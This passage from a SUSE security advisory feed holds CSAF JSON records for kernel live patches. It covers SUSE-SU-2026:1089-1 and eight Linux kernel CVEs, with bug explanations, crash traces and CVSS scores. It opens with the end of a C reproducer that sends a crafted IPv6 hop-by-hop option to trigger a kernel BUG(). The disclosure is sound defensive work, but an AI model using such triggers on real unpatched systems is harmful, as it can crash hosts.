cmsghdr\n cmsg-\u003ecmsg_len = 
cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:03:58Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
}
]
}
SUSE-SU-2026:1089-1
Vulnerability from csaf_suse - Published: 2026-03-26 17:34 - Updated: 2026-03-26 17:34
Summary
Security update for the Linux Kernel (Live Patch 14 for SUSE Linux Enterprise 15 SP6)
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel (Live Patch 14 for SUSE Linux Enterprise 15 SP6)
Description of the patch:
This update for the SUSE Linux Enterprise Kernel 6.4.0-150600.23.65 fixes various security issues
The following security issues were fixed:
- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).
- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).
- CVE-2025-40284: Bluetooth: MGMT: cancel mesh send timer when hdev removed (bsc#1257669).
- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).
Patchnames: SUSE-2026-1089,SUSE-SLE-Module-Live-Patching-15-SP6-2026-1089
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64 | — | | Vendor Fix |
Threats
Impact
important
7.8 (High)
7.3 (High)
7.5 (High)
7.5 (High)
References
44 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel (Live Patch 14 for SUSE Linux Enterprise 15 SP6)",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThis update for the SUSE Linux Enterprise Kernel 6.4.0-150600.23.65 fixes various security issues\n\nThe following security issues were fixed:\n\n- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).\n- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).\n- CVE-2025-40284: Bluetooth: MGMT: cancel mesh send timer when hdev removed (bsc#1257669).\n- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1089,SUSE-SLE-Module-Live-Patching-15-SP6-2026-1089",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1089-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1089-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261089-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1089-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024960.html"
},
{
"category": "self",
"summary": "SUSE Bug 1247240",
"url": "https://bugzilla.suse.com/1247240"
},
{
"category": "self",
"summary": "SUSE Bug 1255053",
"url": "https://bugzilla.suse.com/1255053"
},
{
"category": "self",
"summary": "SUSE Bug 1255378",
"url": "https://bugzilla.suse.com/1255378"
},
{
"category": "self",
"summary": "SUSE Bug 1255402",
"url": "https://bugzilla.suse.com/1255402"
},
{
"category": "self",
"summary": "SUSE Bug 1255895",
"url": "https://bugzilla.suse.com/1255895"
},
{
"category": "self",
"summary": "SUSE Bug 1256624",
"url": "https://bugzilla.suse.com/1256624"
},
{
"category": "self",
"summary": "SUSE Bug 1256644",
"url": "https://bugzilla.suse.com/1256644"
},
{
"category": "self",
"summary": "SUSE Bug 1257669",
"url": "https://bugzilla.suse.com/1257669"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38488 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38488/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40258 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
}
],
"title": "Security update for the Linux Kernel (Live Patch 14 for SUSE Linux Enterprise 15 SP6)",
"tracking": {
"current_release_date": "2026-03-26T17:34:58Z",
"generator": {
"date": "2026-03-26T17:34:58Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1089-1",
"initial_release_date": "2026-03-26T17:34:58Z",
"revision_history": [
{
"date": "2026-03-26T17:34:58Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"product_id": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64",
"product_id": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp6"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-38488",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38488"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix use-after-free in crypt_message when using async crypto\n\nThe CVE-2024-50047 fix removed asynchronous crypto handling from\ncrypt_message(), assuming all crypto operations are synchronous.\nHowever, when hardware crypto accelerators are used, this can cause\nuse-after-free crashes:\n\n crypt_message()\n // Allocate the creq buffer containing the req\n creq = smb2_get_aead_req(..., \u0026req);\n\n // Async encryption returns -EINPROGRESS immediately\n rc = enc ? crypto_aead_encrypt(req) : crypto_aead_decrypt(req);\n\n // Free creq while async operation is still in progress\n kvfree_sensitive(creq, ...);\n\nHardware crypto modules often implement async AEAD operations for\nperformance. When crypto_aead_encrypt/decrypt() returns -EINPROGRESS,\nthe operation completes asynchronously. Without crypto_wait_req(),\nthe function immediately frees the request buffer, leading to crashes\nwhen the driver later accesses the freed memory.\n\nThis results in a use-after-free condition when the hardware crypto\ndriver later accesses the freed request structure, leading to kernel\ncrashes with NULL pointer dereferences.\n\nThe issue occurs because crypto_alloc_aead() with mask=0 doesn\u0027t\nguarantee synchronous operation. Even without CRYPTO_ALG_ASYNC in\nthe mask, async implementations can be selected.\n\nFix by restoring the async crypto handling:\n- DECLARE_CRYPTO_WAIT(wait) for completion tracking\n- aead_request_set_callback() for async completion notification\n- crypto_wait_req() to wait for operation completion\n\nThis ensures the request buffer isn\u0027t freed until the crypto operation\ncompletes, whether synchronous or asynchronous, while preserving the\nCVE-2024-50047 fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38488",
"url": "https://www.suse.com/security/cve/CVE-2025-38488"
},
{
"category": "external",
"summary": "SUSE Bug 1247239 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247239"
},
{
"category": "external",
"summary": "SUSE Bug 1247240 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247240"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:34:58Z",
"details": "important"
}
],
"title": "CVE-2025-38488"
},
{
"cve": "CVE-2025-40258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40258"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix race condition in mptcp_schedule_work()\n\nsyzbot reported use-after-free in mptcp_schedule_work() [1]\n\nIssue here is that mptcp_schedule_work() schedules a work,\nthen gets a refcount on sk-\u003esk_refcnt if the work was scheduled.\nThis refcount will be released by mptcp_worker().\n\n[A] if (schedule_work(...)) {\n[B] sock_hold(sk);\n return true;\n }\n\nProblem is that mptcp_worker() can run immediately and complete before [B]\n\nWe need instead :\n\n sock_hold(sk);\n if (schedule_work(...))\n return true;\n sock_put(sk);\n\n[1]\nrefcount_t: addition on 0; use-after-free.\n WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25\nCall Trace:\n \u003cTASK\u003e\n __refcount_add include/linux/refcount.h:-1 [inline]\n __refcount_inc include/linux/refcount.h:366 [inline]\n refcount_inc include/linux/refcount.h:383 [inline]\n sock_hold include/net/sock.h:816 [inline]\n mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943\n mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316\n call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747\n expire_timers kernel/time/timer.c:1798 [inline]\n __run_timers kernel/time/timer.c:2372 [inline]\n __run_timer_base+0x648/0x970 kernel/time/timer.c:2384\n run_timer_base kernel/time/timer.c:2393 [inline]\n run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n run_ktimerd+0xcf/0x190 kernel/softirq.c:1138\n smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40258",
"url": "https://www.suse.com/security/cve/CVE-2025-40258"
},
{
"category": "external",
"summary": "SUSE Bug 1254843 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1254843"
},
{
"category": "external",
"summary": "SUSE Bug 1255053 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1255053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:34:58Z",
"details": "important"
}
],
"title": "CVE-2025-40258"
},
{
"cve": "CVE-2025-40284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: MGMT: cancel mesh send timer when hdev removed\n\nmesh_send_done timer is not canceled when hdev is removed, which causes\ncrash if the timer triggers after hdev is gone.\n\nCancel the timer when MGMT removes the hdev, like other MGMT timers.\n\nShould fix the BUG: sporadically seen by BlueZ test bot\n(in \"Mesh - Send cancel - 1\" test).\n\nLog:\n------\nBUG: KASAN: slab-use-after-free in run_timer_softirq+0x76b/0x7d0\n...\nFreed by task 36:\n kasan_save_stack+0x24/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3a/0x60\n __kasan_slab_free+0x43/0x70\n kfree+0x103/0x500\n device_release+0x9a/0x210\n kobject_put+0x100/0x1e0\n vhci_release+0x18b/0x240\n------",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40284",
"url": "https://www.suse.com/security/cve/CVE-2025-40284"
},
{
"category": "external",
"summary": "SUSE Bug 1254860 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1254860"
},
{
"category": "external",
"summary": "SUSE Bug 1257669 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1257669"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:34:58Z",
"details": "important"
}
],
"title": "CVE-2025-40284"
},
{
"cve": "CVE-2025-40297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: bridge: fix use-after-free due to MST port state bypass\n\nsyzbot reported[1] a use-after-free when deleting an expired fdb. It is\ndue to a race condition between learning still happening and a port being\ndeleted, after all its fdbs have been flushed. The port\u0027s state has been\ntoggled to disabled so no learning should happen at that time, but if we\nhave MST enabled, it will bypass the port\u0027s state, that together with VLAN\nfiltering disabled can lead to fdb learning at a time when it shouldn\u0027t\nhappen while the port is being deleted. VLAN filtering must be disabled\nbecause we flush the port VLANs when it\u0027s being deleted which will stop\nlearning. This fix adds a check for the port\u0027s vlan group which is\ninitialized to NULL when the port is getting deleted, that avoids the port\nstate bypass. When MST is enabled there would be a minimal new overhead\nin the fast-path because the port\u0027s vlan group pointer is cache-hot.\n\n[1] https://syzkaller.appspot.com/bug?extid=dd280197f0f7ab3917be",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40297",
"url": "https://www.suse.com/security/cve/CVE-2025-40297"
},
{
"category": "external",
"summary": "SUSE Bug 1255187 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255187"
},
{
"category": "external",
"summary": "SUSE Bug 1255895 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255895"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:34:58Z",
"details": "important"
}
],
"title": "CVE-2025-40297"
},
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:34:58Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
